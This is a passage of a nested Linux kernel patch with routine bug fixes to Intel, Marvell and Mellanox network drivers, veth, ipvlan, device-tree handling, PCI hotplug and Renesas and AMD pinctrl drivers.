++	    !pf->vf[vsi->vf_id].trusted) {
+ 		clear_bit(__I40E_VSI_OVERFLOW_PROMISC, vsi->state);
+ 		goto out;
+ 	}
+diff --git a/drivers/net/ethernet/intel/ice/ice_base.c b/drivers/net/ethernet/intel/ice/ice_base.c
+index e864634d66bc6..818eca6aa4a41 100644
+--- a/drivers/net/ethernet/intel/ice/ice_base.c
++++ b/drivers/net/ethernet/intel/ice/ice_base.c
+@@ -396,7 +396,8 @@ static int ice_setup_rx_ctx(struct ice_rx_ring *ring)
+ 	/* Receive Packet Data Buffer Size.
+ 	 * The Packet Data Buffer Size is defined in 128 byte units.
+ 	 */
+-	rlan_ctx.dbuf = ring->rx_buf_len >> ICE_RLAN_CTX_DBUF_S;
++	rlan_ctx.dbuf = DIV_ROUND_UP(ring->rx_buf_len,
++				     BIT_ULL(ICE_RLAN_CTX_DBUF_S));
+ 
+ 	/* use 32 byte descriptors */
+ 	rlan_ctx.dsize = 1;
+diff --git a/drivers/net/ethernet/intel/ice/ice_sriov.c b/drivers/net/ethernet/intel/ice/ice_sriov.c
+index b8c31bf721ad1..b719e9a771e36 100644
+--- a/drivers/net/ethernet/intel/ice/ice_sriov.c
++++ b/drivers/net/ethernet/intel/ice/ice_sriov.c
+@@ -1240,7 +1240,7 @@ int ice_set_vf_spoofchk(struct net_device *netdev, int vf_id, bool ena)
+ 	if (!vf)
+ 		return -EINVAL;
+ 
+-	ret = ice_check_vf_ready_for_reset(vf);
++	ret = ice_check_vf_ready_for_cfg(vf);
+ 	if (ret)
+ 		goto out_put_vf;
+ 
+@@ -1355,7 +1355,7 @@ int ice_set_vf_mac(struct net_device *netdev, int vf_id, u8 *mac)
+ 		goto out_put_vf;
+ 	}
+ 
+-	ret = ice_check_vf_ready_for_reset(vf);
++	ret = ice_check_vf_ready_for_cfg(vf);
+ 	if (ret)
+ 		goto out_put_vf;
+ 
+@@ -1409,7 +1409,7 @@ int ice_set_vf_trust(struct net_device *netdev, int vf_id, bool trusted)
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+-	ret = ice_check_vf_ready_for_reset(vf);
++	ret = ice_check_vf_ready_for_cfg(vf);
+ 	if (ret)
+ 		goto out_put_vf;
+ 
+@@ -1722,7 +1722,7 @@ ice_set_vf_port_vlan(struct net_device *netdev, int vf_id, u16 vlan_id, u8 qos,
+ 	if (!vf)
+ 		return -EINVAL;
+ 
+-	ret = ice_check_vf_ready_for_reset(vf);
++	ret = ice_check_vf_ready_for_cfg(vf);
+ 	if (ret)
+ 		goto out_put_vf;
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_vf_lib.c b/drivers/net/ethernet/intel/ice/ice_vf_lib.c
+index 71047fc341392..9dbe6e9bb1f79 100644
+--- a/drivers/net/ethernet/intel/ice/ice_vf_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_vf_lib.c
+@@ -185,25 +185,6 @@ int ice_check_vf_ready_for_cfg(struct ice_vf *vf)
+ 	return 0;
+ }
+ 
+-/**
+- * ice_check_vf_ready_for_reset - check if VF is ready to be reset
+- * @vf: VF to check if it's ready to be reset
+- *
+- * The purpose of this function is to ensure that the VF is not in reset,
+- * disabled, and is both initialized and active, thus enabling us to safely
+- * initialize another reset.
+- */
+-int ice_check_vf_ready_for_reset(struct ice_vf *vf)
+-{
+-	int ret;
+-
+-	ret = ice_check_vf_ready_for_cfg(vf);
+-	if (!ret && !test_bit(ICE_VF_STATE_ACTIVE, vf->vf_states))
+-		ret = -EAGAIN;
+-
+-	return ret;
+-}
+-
+ /**
+  * ice_trigger_vf_reset - Reset a VF on HW
+  * @vf: pointer to the VF structure
+@@ -588,11 +569,17 @@ int ice_reset_vf(struct ice_vf *vf, u32 flags)
+ 		return 0;
+ 	}
+ 
++	if (flags & ICE_VF_RESET_LOCK)
++		mutex_lock(&vf->cfg_lock);
++	else
++		lockdep_assert_held(&vf->cfg_lock);
++
+ 	if (ice_is_vf_disabled(vf)) {
+ 		vsi = ice_get_vf_vsi(vf);
+ 		if (!vsi) {
+ 			dev_dbg(dev, "VF is already removed\n");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto out_unlock;
+ 		}
+ 		ice_vsi_stop_lan_tx_rings(vsi, ICE_NO_RESET, vf->vf_id);
+ 
+@@ -601,14 +588,9 @@ int ice_reset_vf(struct ice_vf *vf, u32 flags)
+ 
+ 		dev_dbg(dev, "VF is already disabled, there is no need for resetting it, telling VM, all is fine %d\n",
+ 			vf->vf_id);
+-		return 0;
++		goto out_unlock;
+ 	}
+ 
+-	if (flags & ICE_VF_RESET_LOCK)
+-		mutex_lock(&vf->cfg_lock);
+-	else
+-		lockdep_assert_held(&vf->cfg_lock);
+-
+ 	/* Set VF disable bit state here, before triggering reset */
+ 	set_bit(ICE_VF_STATE_DIS, vf->vf_states);
+ 	ice_trigger_vf_reset(vf, flags & ICE_VF_RESET_VFLR, false);
+diff --git a/drivers/net/ethernet/intel/ice/ice_vf_lib.h b/drivers/net/ethernet/intel/ice/ice_vf_lib.h
+index e5bed85724622..9f7fcd8e5714b 100644
+--- a/drivers/net/ethernet/intel/ice/ice_vf_lib.h
++++ b/drivers/net/ethernet/intel/ice/ice_vf_lib.h
+@@ -214,7 +214,6 @@ u16 ice_get_num_vfs(struct ice_pf *pf);
+ struct ice_vsi *ice_get_vf_vsi(struct ice_vf *vf);
+ bool ice_is_vf_disabled(struct ice_vf *vf);
+ int ice_check_vf_ready_for_cfg(struct ice_vf *vf);
+-int ice_check_vf_ready_for_reset(struct ice_vf *vf);
+ void ice_set_vf_state_dis(struct ice_vf *vf);
+ bool ice_is_any_vf_in_unicast_promisc(struct ice_pf *pf);
+ void
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl.c b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+index ef3c709d6a750..2b4c791b6cbad 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+@@ -3722,7 +3722,6 @@ error_handler:
+ 		ice_vc_notify_vf_link_state(vf);
+ 		break;
+ 	case VIRTCHNL_OP_RESET_VF:
+-		clear_bit(ICE_VF_STATE_ACTIVE, vf->vf_states);
+ 		ops->reset_vf(vf);
+ 		break;
+ 	case VIRTCHNL_OP_ADD_ETH_ADDR:
+diff --git a/drivers/net/ethernet/intel/igb/igb_ptp.c b/drivers/net/ethernet/intel/igb/igb_ptp.c
+index 15e57460e19ea..07171e574e7d7 100644
+--- a/drivers/net/ethernet/intel/igb/igb_ptp.c
++++ b/drivers/net/ethernet/intel/igb/igb_ptp.c
+@@ -1404,18 +1404,6 @@ void igb_ptp_init(struct igb_adapter *adapter)
+ 		return;
+ 	}
+ 
+-	spin_lock_init(&adapter->tmreg_lock);
+-	INIT_WORK(&adapter->ptp_tx_work, igb_ptp_tx_work);
+-
+-	if (adapter->ptp_flags & IGB_PTP_OVERFLOW_CHECK)
+-		INIT_DELAYED_WORK(&adapter->ptp_overflow_work,
+-				  igb_ptp_overflow_check);
+-
+-	adapter->tstamp_config.rx_filter = HWTSTAMP_FILTER_NONE;
+-	adapter->tstamp_config.tx_type = HWTSTAMP_TX_OFF;
+-
+-	igb_ptp_reset(adapter);
+-
+ 	adapter->ptp_clock = ptp_clock_register(&adapter->ptp_caps,
+ 						&adapter->pdev->dev);
+ 	if (IS_ERR(adapter->ptp_clock)) {
+@@ -1425,6 +1413,18 @@ void igb_ptp_init(struct igb_adapter *adapter)
+ 		dev_info(&adapter->pdev->dev, "added PHC on %s\n",
+ 			 adapter->netdev->name);
+ 		adapter->ptp_flags |= IGB_PTP_ENABLED;
++
++		spin_lock_init(&adapter->tmreg_lock);
++		INIT_WORK(&adapter->ptp_tx_work, igb_ptp_tx_work);
++
++		if (adapter->ptp_flags & IGB_PTP_OVERFLOW_CHECK)
++			INIT_DELAYED_WORK(&adapter->ptp_overflow_work,
++					  igb_ptp_overflow_check);
++
++		adapter->tstamp_config.rx_filter = HWTSTAMP_FILTER_NONE;
++		adapter->tstamp_config.tx_type = HWTSTAMP_TX_OFF;
++
++		igb_ptp_reset(adapter);
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/igc/igc_defines.h b/drivers/net/ethernet/intel/igc/igc_defines.h
+index dbfa4b9dee066..90ca01889cd82 100644
+--- a/drivers/net/ethernet/intel/igc/igc_defines.h
++++ b/drivers/net/ethernet/intel/igc/igc_defines.h
+@@ -536,7 +536,7 @@
+ #define IGC_PTM_CTRL_START_NOW	BIT(29) /* Start PTM Now */
+ #define IGC_PTM_CTRL_EN		BIT(30) /* Enable PTM */
+ #define IGC_PTM_CTRL_TRIG	BIT(31) /* PTM Cycle trigger */
+-#define IGC_PTM_CTRL_SHRT_CYC(usec)	(((usec) & 0x2f) << 2)
++#define IGC_PTM_CTRL_SHRT_CYC(usec)	(((usec) & 0x3f) << 2)
+ #define IGC_PTM_CTRL_PTM_TO(usec)	(((usec) & 0xff) << 8)
+ 
+ #define IGC_PTM_SHORT_CYC_DEFAULT	10  /* Default Short/interrupted cycle interval */
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index 705325431dec3..5541e284cd3f0 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -4005,9 +4005,10 @@ rx_frscfg:
+ 	if (link < 0)
+ 		return NIX_AF_ERR_RX_LINK_INVALID;
+ 
+-	nix_find_link_frs(rvu, req, pcifunc);
+ 
+ linkcfg:
++	nix_find_link_frs(rvu, req, pcifunc);
++
+ 	cfg = rvu_read64(rvu, blkaddr, NIX_AF_RX_LINKX_CFG(link));
+ 	cfg = (cfg & ~(0xFFFFULL << 16)) | ((u64)req->maxlen << 16);
+ 	if (req->update_minlen)
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/core_acl_flex_keys.c b/drivers/net/ethernet/mellanox/mlxsw/core_acl_flex_keys.c
+index bd1a51a0a5408..f208a237d0b52 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/core_acl_flex_keys.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/core_acl_flex_keys.c
+@@ -32,8 +32,8 @@ static const struct mlxsw_afk_element_info mlxsw_afk_element_infos[] = {
+ 	MLXSW_AFK_ELEMENT_INFO_U32(IP_TTL_, 0x18, 0, 8),
+ 	MLXSW_AFK_ELEMENT_INFO_U32(IP_ECN, 0x18, 9, 2),
+ 	MLXSW_AFK_ELEMENT_INFO_U32(IP_DSCP, 0x18, 11, 6),
+-	MLXSW_AFK_ELEMENT_INFO_U32(VIRT_ROUTER_MSB, 0x18, 17, 3),
+-	MLXSW_AFK_ELEMENT_INFO_U32(VIRT_ROUTER_LSB, 0x18, 20, 8),
++	MLXSW_AFK_ELEMENT_INFO_U32(VIRT_ROUTER_MSB, 0x18, 17, 4),
++	MLXSW_AFK_ELEMENT_INFO_U32(VIRT_ROUTER_LSB, 0x18, 21, 8),
+ 	MLXSW_AFK_ELEMENT_INFO_BUF(SRC_IP_96_127, 0x20, 4),
+ 	MLXSW_AFK_ELEMENT_INFO_BUF(SRC_IP_64_95, 0x24, 4),
+ 	MLXSW_AFK_ELEMENT_INFO_BUF(SRC_IP_32_63, 0x28, 4),
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/pci.c b/drivers/net/ethernet/mellanox/mlxsw/pci.c
+index c968309657dd1..51eea1f0529c8 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/pci.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/pci.c
+@@ -517,11 +517,15 @@ static void mlxsw_pci_skb_cb_ts_set(struct mlxsw_pci *mlxsw_pci,
+ 				    struct sk_buff *skb,
+ 				    enum mlxsw_pci_cqe_v cqe_v, char *cqe)
+ {
++	u8 ts_type;
++
+ 	if (cqe_v != MLXSW_PCI_CQE_V2)
+ 		return;
+ 
+-	if (mlxsw_pci_cqe2_time_stamp_type_get(cqe) !=
+-	    MLXSW_PCI_CQE_TIME_STAMP_TYPE_UTC)
++	ts_type = mlxsw_pci_cqe2_time_stamp_type_get(cqe);
++
++	if (ts_type != MLXSW_PCI_CQE_TIME_STAMP_TYPE_UTC &&
++	    ts_type != MLXSW_PCI_CQE_TIME_STAMP_TYPE_MIRROR_UTC)
+ 		return;
+ 
+ 	mlxsw_skb_cb(skb)->cqe_ts.sec = mlxsw_pci_cqe2_time_stamp_sec_get(cqe);
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/reg.h b/drivers/net/ethernet/mellanox/mlxsw/reg.h
+index 0777bed5bb1af..a34ff19c58bd2 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/reg.h
++++ b/drivers/net/ethernet/mellanox/mlxsw/reg.h
+@@ -97,14 +97,6 @@ MLXSW_ITEM32(reg, sspr, m, 0x00, 31, 1);
+  */
+ MLXSW_ITEM32_LP(reg, sspr, 0x00, 16, 0x00, 12);
+ 
+-/* reg_sspr_sub_port
+- * Virtual port within the physical port.
+- * Should be set to 0 when virtual ports are not enabled on the port.
+- *
+- * Access: RW
+- */
+-MLXSW_ITEM32(reg, sspr, sub_port, 0x00, 8, 8);
+-
+ /* reg_sspr_system_port
+  * Unique identifier within the stacking domain that represents all the ports
+  * that are available in the system (external ports).
+@@ -120,7 +112,6 @@ static inline void mlxsw_reg_sspr_pack(char *payload, u16 local_port)
+ 	MLXSW_REG_ZERO(sspr, payload);
+ 	mlxsw_reg_sspr_m_set(payload, 1);
+ 	mlxsw_reg_sspr_local_port_set(payload, local_port);
+-	mlxsw_reg_sspr_sub_port_set(payload, 0);
+ 	mlxsw_reg_sspr_system_port_set(payload, local_port);
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum2_mr_tcam.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum2_mr_tcam.c
+index e4f4cded2b6f9..b1178b7a7f51a 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum2_mr_tcam.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum2_mr_tcam.c
+@@ -193,7 +193,7 @@ mlxsw_sp2_mr_tcam_rule_parse(struct mlxsw_sp_acl_rule *rule,
+ 				       key->vrid, GENMASK(7, 0));
+ 	mlxsw_sp_acl_rulei_keymask_u32(rulei,
+ 				       MLXSW_AFK_ELEMENT_VIRT_ROUTER_MSB,
+-				       key->vrid >> 8, GENMASK(2, 0));
++				       key->vrid >> 8, GENMASK(3, 0));
+ 	switch (key->proto) {
+ 	case MLXSW_SP_L3_PROTO_IPV4:
+ 		return mlxsw_sp2_mr_tcam_rule_parse4(rulei, key);
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_flex_keys.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_flex_keys.c
+index 00c32320f8915..173808c096bab 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_flex_keys.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_flex_keys.c
+@@ -169,7 +169,7 @@ static struct mlxsw_afk_element_inst mlxsw_sp_afk_element_info_ipv4_2[] = {
+ 
+ static struct mlxsw_afk_element_inst mlxsw_sp_afk_element_info_ipv4_4[] = {
+ 	MLXSW_AFK_ELEMENT_INST_U32(VIRT_ROUTER_LSB, 0x04, 24, 8),
+-	MLXSW_AFK_ELEMENT_INST_U32(VIRT_ROUTER_MSB, 0x00, 0, 3),
++	MLXSW_AFK_ELEMENT_INST_EXT_U32(VIRT_ROUTER_MSB, 0x00, 0, 3, 0, true),
+ };
+ 
+ static struct mlxsw_afk_element_inst mlxsw_sp_afk_element_info_ipv6_0[] = {
+@@ -319,7 +319,7 @@ static struct mlxsw_afk_element_inst mlxsw_sp_afk_element_info_mac_5b[] = {
+ 
+ static struct mlxsw_afk_element_inst mlxsw_sp_afk_element_info_ipv4_4b[] = {
+ 	MLXSW_AFK_ELEMENT_INST_U32(VIRT_ROUTER_LSB, 0x04, 13, 8),
+-	MLXSW_AFK_ELEMENT_INST_EXT_U32(VIRT_ROUTER_MSB, 0x04, 21, 4, 0, true),
++	MLXSW_AFK_ELEMENT_INST_U32(VIRT_ROUTER_MSB, 0x04, 21, 4),
+ };
+ 
+ static struct mlxsw_afk_element_inst mlxsw_sp_afk_element_info_ipv6_2b[] = {
+diff --git a/drivers/net/ipvlan/ipvlan_main.c b/drivers/net/ipvlan/ipvlan_main.c
+index 796a38f9d7b24..cd16bc8bf154c 100644
+--- a/drivers/net/ipvlan/ipvlan_main.c
++++ b/drivers/net/ipvlan/ipvlan_main.c
+@@ -748,7 +748,8 @@ static int ipvlan_device_event(struct notifier_block *unused,
+ 
+ 		write_pnet(&port->pnet, newnet);
+ 
+-		ipvlan_migrate_l3s_hook(oldnet, newnet);
++		if (port->mode == IPVLAN_MODE_L3S)
++			ipvlan_migrate_l3s_hook(oldnet, newnet);
+ 		break;
+ 	}
+ 	case NETDEV_UNREGISTER:
+diff --git a/drivers/net/veth.c b/drivers/net/veth.c
+index a71786b3e7ba7..727b9278b9fe5 100644
+--- a/drivers/net/veth.c
++++ b/drivers/net/veth.c
+@@ -1716,10 +1716,7 @@ static int veth_newlink(struct net *src_net, struct net_device *dev,
+ 
+ 		nla_peer = data[VETH_INFO_PEER];
+ 		ifmp = nla_data(nla_peer);
+-		err = rtnl_nla_parse_ifla(peer_tb,
+-					  nla_data(nla_peer) + sizeof(struct ifinfomsg),
+-					  nla_len(nla_peer) - sizeof(struct ifinfomsg),
+-					  NULL);
++		err = rtnl_nla_parse_ifinfomsg(peer_tb, nla_peer, extack);
+ 		if (err < 0)
+ 			return err;
+ 
+diff --git a/drivers/of/dynamic.c b/drivers/of/dynamic.c
+index cd3821a6444f0..4e436f2d13aeb 100644
+--- a/drivers/of/dynamic.c
++++ b/drivers/of/dynamic.c
+@@ -63,15 +63,14 @@ int of_reconfig_notifier_unregister(struct notifier_block *nb)
+ }
+ EXPORT_SYMBOL_GPL(of_reconfig_notifier_unregister);
+ 
+-#ifdef DEBUG
+-const char *action_names[] = {
++static const char *action_names[] = {
++	[0] = "INVALID",
+ 	[OF_RECONFIG_ATTACH_NODE] = "ATTACH_NODE",
+ 	[OF_RECONFIG_DETACH_NODE] = "DETACH_NODE",
+ 	[OF_RECONFIG_ADD_PROPERTY] = "ADD_PROPERTY",
+ 	[OF_RECONFIG_REMOVE_PROPERTY] = "REMOVE_PROPERTY",
+ 	[OF_RECONFIG_UPDATE_PROPERTY] = "UPDATE_PROPERTY",
+ };
+-#endif
+ 
+ int of_reconfig_notify(unsigned long action, struct of_reconfig_data *p)
+ {
+@@ -594,21 +593,9 @@ static int __of_changeset_entry_apply(struct of_changeset_entry *ce)
+ 		}
+ 
+ 		ret = __of_add_property(ce->np, ce->prop);
+-		if (ret) {
+-			pr_err("changeset: add_property failed @%pOF/%s\n",
+-				ce->np,
+-				ce->prop->name);
+-			break;
+-		}
+ 		break;
+ 	case OF_RECONFIG_REMOVE_PROPERTY:
+ 		ret = __of_remove_property(ce->np, ce->prop);
+-		if (ret) {
+-			pr_err("changeset: remove_property failed @%pOF/%s\n",
+-				ce->np,
+-				ce->prop->name);
+-			break;
+-		}
+ 		break;
+ 
+ 	case OF_RECONFIG_UPDATE_PROPERTY:
+@@ -622,20 +609,17 @@ static int __of_changeset_entry_apply(struct of_changeset_entry *ce)
+ 		}
+ 
+ 		ret = __of_update_property(ce->np, ce->prop, &old_prop);
+-		if (ret) {
+-			pr_err("changeset: update_property failed @%pOF/%s\n",
+-				ce->np,
+-				ce->prop->name);
+-			break;
+-		}
+ 		break;
+ 	default:
+ 		ret = -EINVAL;
+ 	}
+ 	raw_spin_unlock_irqrestore(&devtree_lock, flags);
+ 
+-	if (ret)
++	if (ret) {
++		pr_err("changeset: apply failed: %-15s %pOF:%s\n",
++		       action_names[ce->action], ce->np, ce->prop->name);
+ 		return ret;
++	}
+ 
+ 	switch (ce->action) {
+ 	case OF_RECONFIG_ATTACH_NODE:
+@@ -921,6 +905,9 @@ int of_changeset_action(struct of_changeset *ocs, unsigned long action,
+ 	if (!ce)
+ 		return -ENOMEM;
+ 
++	if (WARN_ON(action >= ARRAY_SIZE(action_names)))
++		return -EINVAL;
++
+ 	/* get a reference to the node */
+ 	ce->action = action;
+ 	ce->np = of_node_get(np);
+diff --git a/drivers/of/kexec.c b/drivers/of/kexec.c
+index f26d2ba8a3715..68278340cecfe 100644
+--- a/drivers/of/kexec.c
++++ b/drivers/of/kexec.c
+@@ -184,7 +184,8 @@ int __init ima_free_kexec_buffer(void)
+ 	if (ret)
+ 		return ret;
+ 
+-	return memblock_phys_free(addr, size);
++	memblock_free_late(addr, size);
++	return 0;
+ }
+ #endif
+ 
+diff --git a/drivers/of/unittest.c b/drivers/of/unittest.c
+index b89ab5d9fea55..9be6ed47a1ce4 100644
+--- a/drivers/of/unittest.c
++++ b/drivers/of/unittest.c
+@@ -657,12 +657,12 @@ static void __init of_unittest_parse_phandle_with_args_map(void)
+ 	memset(&args, 0, sizeof(args));
+ 
+ 	EXPECT_BEGIN(KERN_INFO,
+-		     "OF: /testcase-data/phandle-tests/consumer-b: could not find phandle");
++		     "OF: /testcase-data/phandle-tests/consumer-b: could not find phandle 12345678");
+ 
+ 	rc = of_parse_phandle_with_args_map(np, "phandle-list-bad-phandle",
+ 					    "phandle", 0, &args);
+ 	EXPECT_END(KERN_INFO,
+-		   "OF: /testcase-data/phandle-tests/consumer-b: could not find phandle");
++		   "OF: /testcase-data/phandle-tests/consumer-b: could not find phandle 12345678");
+ 
+ 	unittest(rc == -EINVAL, "expected:%i got:%i\n", -EINVAL, rc);
+ 
+diff --git a/drivers/pci/hotplug/acpiphp_glue.c b/drivers/pci/hotplug/acpiphp_glue.c
+index 6efa3d8db9a56..ea0195337bab9 100644
+--- a/drivers/pci/hotplug/acpiphp_glue.c
++++ b/drivers/pci/hotplug/acpiphp_glue.c
+@@ -504,12 +504,15 @@ static void enable_slot(struct acpiphp_slot *slot, bool bridge)
+ 				if (pass && dev->subordinate) {
+ 					check_hotplug_bridge(slot, dev);
+ 					pcibios_resource_survey_bus(dev->subordinate);
+-					__pci_bus_size_bridges(dev->subordinate,
+-							       &add_list);
++					if (pci_is_root_bus(bus))
++						__pci_bus_size_bridges(dev->subordinate, &add_list);
+ 				}
+ 			}
+ 		}
+-		__pci_bus_assign_resources(bus, &add_list, NULL);
++		if (pci_is_root_bus(bus))
++			__pci_bus_assign_resources(bus, &add_list, NULL);
++		else
++			pci_assign_unassigned_bridge_resources(bus->self);
+ 	}
+ 
+ 	acpiphp_sanitize_bus(bus);
+diff --git a/drivers/pinctrl/pinctrl-amd.c b/drivers/pinctrl/pinctrl-amd.c
+index a8df77e80549c..be6838c252f09 100644
+--- a/drivers/pinctrl/pinctrl-amd.c
++++ b/drivers/pinctrl/pinctrl-amd.c
+@@ -862,6 +862,33 @@ static const struct pinconf_ops amd_pinconf_ops = {
+ 	.pin_config_group_set = amd_pinconf_group_set,
+ };
+ 
++static void amd_gpio_irq_init(struct amd_gpio *gpio_dev)
++{
++	struct pinctrl_desc *desc = gpio_dev->pctrl->desc;
++	unsigned long flags;
++	u32 pin_reg, mask;
++	int i;
++
++	mask = BIT(WAKE_CNTRL_OFF_S0I3) | BIT(WAKE_CNTRL_OFF_S3) |
++		BIT(WAKE_CNTRL_OFF_S4);
++
++	for (i = 0; i < desc->npins; i++) {
++		int pin = desc->pins[i].number;
++		const struct pin_desc *pd = pin_desc_get(gpio_dev->pctrl, pin);
++
++		if (!pd)
++			continue;
++
++		raw_spin_lock_irqsave(&gpio_dev->lock, flags);
++
++		pin_reg = readl(gpio_dev->base + pin * 4);
++		pin_reg &= ~mask;
++		writel(pin_reg, gpio_dev->base + pin * 4);
++
++		raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
++	}
++}
++
+ #ifdef CONFIG_PM_SLEEP
+ static bool amd_gpio_should_save(struct amd_gpio *gpio_dev, unsigned int pin)
+ {
+@@ -1099,6 +1126,9 @@ static int amd_gpio_probe(struct platform_device *pdev)
+ 		return PTR_ERR(gpio_dev->pctrl);
+ 	}
+ 
++	/* Disable and mask interrupts */
++	amd_gpio_irq_init(gpio_dev);
++
+ 	girq = &gpio_dev->gc.irq;
+ 	gpio_irq_chip_set_chip(girq, &amd_gpio_irqchip);
+ 	/* This will let us handle the parent IRQ in the driver */
+diff --git a/drivers/pinctrl/renesas/pinctrl-rza2.c b/drivers/pinctrl/renesas/pinctrl-rza2.c
+index c0a04f1ee994e..12126e30dc20f 100644
+--- a/drivers/pinctrl/renesas/pinctrl-rza2.c
++++ b/drivers/pinctrl/renesas/pinctrl-rza2.c
+@@ -14,6 +14,7 @@
+ #include <linux/gpio/driver.h>
+ #include <linux/io.h>
+ #include <linux/module.h>
++#include <linux/mutex.h>
+ #include <linux/of_device.h>
+ #include <linux/pinctrl/pinmux.h>
+ 
+@@ -46,6 +47,7 @@ struct rza2_pinctrl_priv {
+ 	struct pinctrl_dev *pctl;
+ 	struct pinctrl_gpio_range gpio_range;
+ 	int npins;
++	struct mutex mutex; /* serialize adding groups and functions */
+ };
+ 
+ #define RZA2_PDR(port)		(0x0000 + (port) * 2)	/* Direction 16-bit */
+@@ -358,10 +360,14 @@ static int rza2_dt_node_to_map(struct pinctrl_dev *pctldev,
+ 		psel_val[i] = MUX_FUNC(value);
+ 	}
+ 
++	mutex_lock(&priv->mutex);
++
+ 	/* Register a single pin group listing all the pins we read from DT */
+ 	gsel = pinctrl_generic_add_group(pctldev, np->name, pins, npins, NULL);
+-	if (gsel < 0)
+-		return gsel;
++	if (gsel < 0) {
++		ret = gsel;
++		goto unlock;
++	}
+ 
+ 	/*
+ 	 * Register a single group function where the 'data' is an array PSEL
+@@ -390,6 +396,8 @@ static int rza2_dt_node_to_map(struct pinctrl_dev *pctldev,
+ 	(*map)->data.mux.function = np->name;
+ 	*num_maps = 1;
+ 
++	mutex_unlock(&priv->mutex);
++
+ 	return 0;
+ 
+ remove_function:
+@@ -398,6 +406,9 @@ remove_function:
+ remove_group:
+ 	pinctrl_generic_remove_group(pctldev, gsel);
+ 
++unlock:
++	mutex_unlock(&priv->mutex);
++
+ 	dev_err(priv->dev, "Unable to parse DT node %s\n", np->name);
+ 
+ 	return ret;
+@@ -473,6 +484,8 @@ static int rza2_pinctrl_probe(struct platform_device *pdev)
+ 	if (IS_ERR(priv->base))
+ 		return PTR_ERR(priv->base);
+ 
++	mutex_init(&priv->mutex);
++
+ 	platform_set_drvdata(pdev, priv);
+ 
+ 	priv->npins = (int)(uintptr_t)of_device_get_match_data(&pdev->dev) *
+diff --git a/drivers/pinctrl/renesas/pinctrl-rzg2l.c b/drivers/pinctrl/renesas/pinctrl-rzg2l.c
+index fd11d28e5a1e4..2a617832a7e60 100644
+--- a/drivers/pinctrl/renesas/pinctrl-rzg2l.c
++++ b/drivers/pinctrl/renesas/pinctrl-rzg2l.c
+@@ -11,6 +11,7 @@
+ #include <linux/io.h>
+ #include <linux/interrupt.h>
+ #include <linux/module.h>
++#include <linux/mutex.h>
+ #include <linux/of_device.h>
+ #include <linux/of_irq.h>
+ #include <linux/pinctrl/pinconf-generic.h>
+@@ -146,10 +147,11 @@ struct rzg2l_pinctrl {
+ 	struct gpio_chip		gpio_chip;
+ 	struct pinctrl_gpio_range	gpio_range;
+ 	DECLARE_BITMAP(tint_slot, RZG2L_TINT_MAX_INTERRUPT);
+-	spinlock_t			bitmap_lock;
++	spinlock_t			bitmap_lock; /* protect tint_slot bitmap */
+ 	unsigned int			hwirq[RZG2L_TINT_MAX_INTERRUPT];
+ 
+-	spinlock_t			lock;
++	spinlock_t			lock; /* lock read/write registers */
++	struct mutex			mutex; /* serialize adding groups and functions */
+ };
+ 
+ static const unsigned int iolh_groupa_mA[] = { 2, 4, 8, 12 };
+@@ -359,11 +361,13 @@ static int rzg2l_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 		name = np->name;
+ 	}
+ 
++	mutex_lock(&pctrl->mutex);
++
+ 	/* Register a single pin group listing all the pins we read from DT */
+ 	gsel = pinctrl_generic_add_group(pctldev, name, pins, num_pinmux, NULL);
+ 	if (gsel < 0) {
+ 		ret = gsel;
+-		goto done;
++		goto unlock;
+ 	}
+ 
+ 	/*
+@@ -377,6 +381,8 @@ static int rzg2l_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 		goto remove_group;
+ 	}
+ 
++	mutex_unlock(&pctrl->mutex);
++
+ 	maps[idx].type = PIN_MAP_TYPE_MUX_GROUP;
+ 	maps[idx].data.mux.group = name;
+ 	maps[idx].data.mux.function = name;
+@@ -388,6 +394,8 @@ static int rzg2l_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 
+ remove_group:
+ 	pinctrl_generic_remove_group(pctldev, gsel);
++unlock:
++	mutex_unlock(&pctrl->mutex);
+ done:
+ 	*index = idx;
+ 	kfree(configs);
+@@ -1501,6 +1509,7 @@ static int rzg2l_pinctrl_probe(struct platform_device *pdev)
+ 
+ 	spin_lock_init(&pctrl->lock);
+ 	spin_lock_init(&pctrl->bitmap_lock);
++	mutex_init(&pctrl->mutex);
+ 
+ 	platform_set_drvdata(pdev, pctrl);
+ 
+diff --git a/drivers/pinctrl/renesas/pinctrl-rzv2m.c b/drivers/pinctrl/renesas/pinctrl-rzv2m.c
+index 35f382b055e83..2858800288bb7 100644
+--- a/drivers/pinctrl/renesas/pinctrl-rzv2m.c
++++ b/drivers/pinctrl/renesas/pinctrl-rzv2m.c
+@@ -14,6 +14,7 @@
+ #include <linux/gpio/driver.h>
+ #include <linux/io.h>
